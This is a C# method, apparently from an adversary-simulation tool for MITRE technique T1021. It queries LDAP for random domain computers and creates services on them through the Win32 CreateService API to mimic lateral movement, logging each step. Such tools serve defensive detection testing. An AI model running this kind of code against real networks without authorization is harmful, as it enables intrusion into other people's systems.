static public void CreateRemoteServiceOnHosts_Old(int nhost, int tsleep, bool cleanup, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1021"); logger.TimestampInfo("Using the Win32 API CreateService function to execute this technique"); try { var rand = new Random(); int computertype = rand.Next(1, 6); logger.TimestampInfo(String.Format("Querying LDAP for random targets...")); List <Computer> targethosts = Targets.GetHostTargets_old(computertype, nhost, logger); logger.TimestampInfo(String.Format("Obtained {0} target computers", targethosts.Count)); List <Task> tasklist = new List <Task>(); //Console.WriteLine("[*] Starting Service Based Lateral Movement attack from {0} as {1}", Environment.MachineName, WindowsIdentity.GetCurrent().Name); if (tsleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", tsleep)); } foreach (Computer computer in targethosts) { Computer temp = computer; if (!computer.Fqdn.ToUpper().Contains(Environment.MachineName.ToUpper())) { tasklist.Add(Task.Factory.StartNew(() => { LateralMovementHelper.CreateRemoteServiceApi_Old(temp, cleanup, logger); })); if (tsleep > 0) { Thread.Sleep(tsleep * 1000); } } } Task.WaitAll(tasklist.ToArray()); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }